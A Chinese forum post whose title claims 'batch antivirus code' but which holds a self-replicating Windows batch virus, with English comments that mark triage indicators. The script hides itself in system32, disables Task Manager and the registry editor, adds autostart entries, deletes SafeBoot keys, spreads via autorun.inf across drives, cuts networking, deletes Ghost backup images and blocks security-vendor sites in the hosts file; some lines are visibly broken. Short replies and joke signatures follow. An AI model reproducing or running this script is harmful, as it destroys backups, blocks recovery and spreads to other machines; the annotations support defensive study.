
[分享] 批处理杀病毒代码!~

批处理杀病毒代码!~

:: Opening of a self-replicating batch script. The window title set on the
:: next line is Chinese for "batch virus".
@echo off&title 批处理病毒
:: Set own attributes.
:: The running script is copied to system32 under the name system.bat, and
:: that copy is then flagged system + hidden + read-only, which keeps it out
:: of default directory listings.
:: Triage indicator: a system.bat carrying those three attributes in the
:: system32 directory.
copy %0 %Windir%\system32\system.bat
attrib %Windir%\system32\system.bat +s +h +r
:: Modify the registry.
:: Two groups of writes follow, all forced with /f and with output sent to nul.
::
:: Group 1 - policy values that remove the tools a user would reach for during
:: cleanup. Each is set to 1 under the current user's Policies key unless noted:
::   DisableRegistryTools - blocks the registry editor
::   DisableTaskMgr       - blocks Task Manager; written twice in this list
::   NoViewContextMenu    - disables the Explorer right-click menu
::   NoSetFolders         - hides Control Panel and related folders
::   NoRun                - removes Run from the Start menu
::   SHOWALL CheckedValue - set to 0 machine-wide, which makes the
::                          "show hidden files" option ineffective
:: Triage: any of these values being present and non-default is an indicator;
:: restoring them is part of recovery.
reg add HkCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f>nul
reg add HkCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f>nul
reg add HkCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 1 /f>nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v CheckedValue /t REG_DWORD /d 0 /f >nul
reg add HkCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f>nul
reg add HkCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetFolders /t REG_DWORD /d 1 /f>nul
reg add HkCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f>nul
:: Group 2 - autostart entries. Values named "bat" and "html" are written to
:: the machine and user Run keys and to RunServices, each holding the path of
:: the system.bat copy under system32.
:: NOTE(review): RunServices is believed to be honoured only by Windows 9x/ME;
:: confirm for the platform being examined.
:: Triage: enumerate the Run and RunServices keys for values pointing at a
:: .bat file in system32.
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v bat /t REG_SZ /d %windir%\system32\system.bat /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v bat /t REG_SZ /d %windir%\system32\system.bat /f > nul
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v html /t REG_SZ /d %windir%\system32\system.bat /f > nul
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices" /v bat /t REG_SZ /d %windir%\system32\system.bat /f > nul
:: Break Safe Mode.
:: The four lines name the SafeBoot Minimal and SafeBoot Network entries for
:: the disk-drive device class GUID, under both ControlSet001 and
:: CurrentControlSet. Safe Mode relies on these entries to load the disk
:: driver class, so their absence prevents a Safe Mode boot.
:: Whether the lines succeed as written is not verified here.
:: Triage: confirm the four keys still exist; restore them from a known-good
:: export if they are missing.
delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /f>nul
delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /f>nul
delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /f>nul
delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /f>nul
:: Copy itself into directories on each disk.
:: First line: a recursive walk of c:\windows\system32 naming *.bat files,
:: with a copy of the running script as the loop body. The stated aim is to
:: replace existing batch files with the script.
:: Loop that follows: for drive letters d through l, the fsutil drive list is
:: filtered with findstr for the letter, and a miss jumps to the label Next
:: defined later in the file. For a hit, DriveT is set to the drive root and
:: each top-level directory is entered with pushd; the body names system.bat
:: and sets read-only + hidden + system on it.
:: NOTE(review): the pushd line contains a mis-encoded character from page
:: extraction and is left exactly as found. Behaviour as written is not
:: verified.
:: Triage: search every volume for hidden system.bat files and compare .bat
:: files under system32 against known-good copies.
for /r c:\windows\system32 %%i (*.bat) do copy %0 %%i
for %%i in (d,e,f,g,h,i,j,k,l) do (
fsutil fsinfo drives | findstr /i %%i|| goto Next
set DriveT=%%i:\
for /d %%j in (!DriveT!*) do (
pushd %%j© %0 %%j\system.bat&attrib +r +h +s system.bat
)
)
:: Write ini configuration files.
:: These lines redirect into win.ini and system.ini in the Windows directory.
:: The text they carry is a [windows] section with run= and load= entries and
:: a [boot] section with a shell= entry, all referencing system.bat. Those
:: are legacy autostart locations.
:: Whether the lines produce that content as written is not verified here.
:: Triage: inspect win.ini for run= and load= entries and system.ini for a
:: shell= entry that names anything besides explorer.exe.
[windows]>> %windir%\win.ini
run=%windir%\system.bat >> %windir%\win.ini
load=%windir%\system.bat >> %windir%\win.ini
[boot] >> %windir%\system.ini
shell=explorer.exe system.bat >> %windir%\system.ini
:: Write autorun.inf.
:: Creates d:\autorun.inf with an [AutoRun] section whose Open entry is
:: system.bat, then flags the file read-only + system + hidden.
:: Mitigation: with AutoRun disabled by policy the Open entry is not acted on.
:: Triage: look for hidden autorun.inf files at volume roots.
echo [AutoRun]>d:\autorun.inf
echo Open=system.bat >>d:\autorun.inf
attrib +r +s +h d:\autorun.inf
:: Copy the autorun.inf file into directories on each disk.
:: Next is the label targeted by the goto in the drive loops. Because the
:: label sits directly above this loop, a findstr miss here jumps back to the
:: start of the same loop.
:: For each drive letter d through l found in the fsutil drive list, DriveT
:: is set to the drive root and every top-level directory is entered with
:: pushd. An autorun.inf with Open=system.bat is written there, and
:: system.bat in that directory is flagged read-only + hidden + system.
:: No popd is issued in this loop.
:: Triage: autorun.inf files inside ordinary subdirectories, not only at
:: volume roots, are an indicator of this script.
:Next
for %%i in (d,e,f,g,h,i,j,k,l) do (
fsutil fsinfo drives | findstr /i %%i|| goto Next
set DriveT=%%i:\
for /d %%j in (!DriveT!*) do (
pushd %%j
echo [AutoRun]>autorun.inf
echo Open=system.bat>>autorun.inf
attrib +r +h +s system.bat
)
)
:: Cut the network connection.
:: Reconfigures the interface named "本地连接", the default name of the
:: wired "Local Area Connection" on Chinese-language Windows. The first
:: command sets a static address 192.168.1.108 with mask 255.255.255.0 and no
:: gateway; the second sets DNS to static with no server address.
:: Triage: an interface unexpectedly switched from DHCP to this static
:: address with no gateway or DNS is an indicator. Recovery is to restore
:: the previous DHCP or static configuration.
netsh interface ip set address name="本地连接" source= static addr= 192.168.1.108 mask= 255.255.255.0 gateway=none
netsh interface IP set dns "本地连接" static addr=none
:: Delete GHO backups.
:: For drives c through j, deletes every *.gho file, with /s recursing into
:: subdirectories, /f forcing read-only files and /q suppressing prompts.
:: Output goes to nul. GHO is the Ghost disk-image format, so this removes
:: local restore images.
:: Mitigation: keep backup images offline or on media the logged-in user
:: cannot write to.
for %%c in (c,d,e,f,g,h,i,j) do del %%c:\*.gho /f /s /q >nul
:: Modify the hosts file so the machine cannot reach antivirus sites.
:: Every line below redirects into the hosts file under system32\drivers\etc.
:: Each carries 127.0.0.1 followed by a host name. The names cover security
:: vendors, Microsoft and several search engines, first with a www prefix and
:: then without it.
:: Two lines, the first www.google.com line and the first bare google.com
:: line, use an overwrite redirect; the rest append.
:: Each line begins with the script's own path, and the effect as written is
:: not verified here.
:: Triage: review the hosts file for loopback mappings of security-vendor or
:: update domains. An emptied or truncated hosts file is also worth noting.
%0 127.0.0.1 www.google.com > %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.google.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.symantec.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.free-av.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.free-av.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.antivir.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.antivir.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.kaspersky.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.kaspersky.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.microsoft.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.microsoft.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.sophos.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.sophos.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.symantec.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.hijackthis.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.spychecker.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.trendmicro.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.trendmicro.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.yahoo.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.yahoo.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.lycos.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 www.lycos.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 google.com > %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 google.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 symantec.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 free-av.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 free-av.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 antivir.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 antivir.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 kaspersky.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 kaspersky.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 microsoft.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 microsoft.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 sophos.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 sophos.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 symantec.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 hijackthis.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 spychecker.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 trendmicro.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 trendmicro.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 yahoo.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 yahoo.de >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 lycos.com >> %windir%\system32\drivers\etc\hosts
%0 127.0.0.1 lycos.de >> %windir%\system32\drivers\etc\hosts


LZ测试过没有啊?
不要问BBS能为你做什么,而要问你为BBS做了什么?


看不明白
一直以为,隐身了别人就找不到我,没有用的,我这样拉风的男人,无论在那里,都像漆黑中的萤火虫一样,那样的鲜明,那样的出众。我那忧郁的眼神,稀嘘的胡喳子,神乎其神的嘴法,还有,那杯82年的矿泉水和发哥给的牙签......都深深的出卖了我


一点都不明白~比日文还难看~
我:老婆我们去qq情报站玩吧.

老婆:儿子在家听话!爸爸回来给你带个5位QQ.

儿子:不嘛,不嘛,爸爸妈妈我也要去qq情报站啊!
